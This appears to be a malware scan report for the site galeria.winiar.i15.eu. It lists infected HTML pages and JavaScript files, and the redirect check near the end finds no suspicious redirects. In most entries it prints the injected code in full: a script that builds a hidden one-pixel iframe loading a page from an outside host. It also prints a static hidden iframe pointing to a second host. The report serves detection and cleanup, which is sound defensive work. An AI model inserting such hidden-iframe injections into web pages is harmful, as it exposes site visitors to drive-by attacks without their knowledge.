Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=galeria.winiar.i15.eu
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://galeria.winiar.i15.eu/ | 200 OK Content-Length: 16428 Content-Type: text/html | malicious |
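Malicious code - confirmed by antiviruses (see below). The script below builds a 1x1-pixel, borderless, absolutely positioned iframe that loads a page from a third-party host, so the visitor's browser requests that page without anything visible appearing on screen; the getElementById check keeps the frame from being inserted more than once per page. Injected code: (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports: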
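Malicious iFrame found. Size: 10x10; style: hidden; src: http://www.proximity.ma/counter.php. This URL is marked by Google as suspicious. Note that this static tag points to a different host than the script-built frame reported above for the same page, so the page carries two separate injections and both must be removed during cleanup. <iframe src="http://www.proximity.ma/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/> | ||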
http://galeria.winiar.i15.eu/kosljun/index.html | 200 OK Content-Length: 2851 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/kosljun/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
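Malicious code - confirmed by antiviruses (see below). This is the same hidden-iframe injection reported for the HTML pages, with the variable and element id renamed to icd; because it is present in a JavaScript file rather than in a page, cleanup has to cover the site's .js files as well as its HTML. Injected code: (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports: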
| ||
http://galeria.winiar.i15.eu/kosljun/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://galeria.winiar.i15.eu/pag1/index.html | 200 OK Content-Length: 2847 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/pag1/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/pag1/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/tovarnele/index.html | 200 OK Content-Length: 2842 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/tovarnele/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/tovarnele/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/bosana/index.html | 200 OK Content-Length: 2852 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/bosana/res/scripts.js | 200 OK Content-Length: 4984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/bosana/res/swfobject.js | 200 OK Content-Length: 9709 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var icd = document.createElement('iframe'); icd.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; icd.style.position = 'absolute'; icd.style.border = '0'; icd.style.height = '1px'; icd.style.width = '1px'; icd.style.left = '1px'; icd.style.top = '1px'; if (!document.getElementById('icd')) { document.write('<div id=\'icd\' ></div>'); document.getElementById('icd').appendChild(icd); }})(); Antivirus reports:
| ||
http://galeria.winiar.i15.eu/pag/index.html | 200 OK Content-Length: 2837 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var r = document.createElement('iframe'); r.src = 'http://jameshbgreen.co.uk/old%20site/counter.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\' ></div>'); document.getElementById('r').appendChild(r); }})(); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 21 Dec 2014 00:43:27 GMT
Accept-Ranges: bytes
ETag: "214ab6c-402c-4e49e5ae89400"
Server: Apache
Content-Length: 16428
Content-Type: text/html
Expires: Sun, 21 Dec 2014 00:43:28 GMT
Last-Modified: Fri, 23 Aug 2013 14:38:08 GMT
...16428 bytes of data.
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 21 Dec 2014 00:43:27 GMT
Accept-Ranges: bytes
ETag: "214ab6c-402c-4e49e5ae89400"
Server: Apache
Content-Length: 16428
Content-Type: text/html
Expires: Sun, 21 Dec 2014 00:43:28 GMT
Last-Modified: Fri, 23 Aug 2013 14:38:08 GMT
...16428 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Referer: http://www.google.com/search?q=galeria.winiar.i15.eu
Result:
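The result is similar to the first query. There are no suspicious redirects found. This check only compares the response to a visit carrying a search-engine Referer with the response to a direct visit; the page returned in both cases is still the one flagged as malicious in the scan above.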
GET / HTTP/1.1
Host: galeria.winiar.i15.eu
Referer: http://www.google.com/search?q=galeria.winiar.i15.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.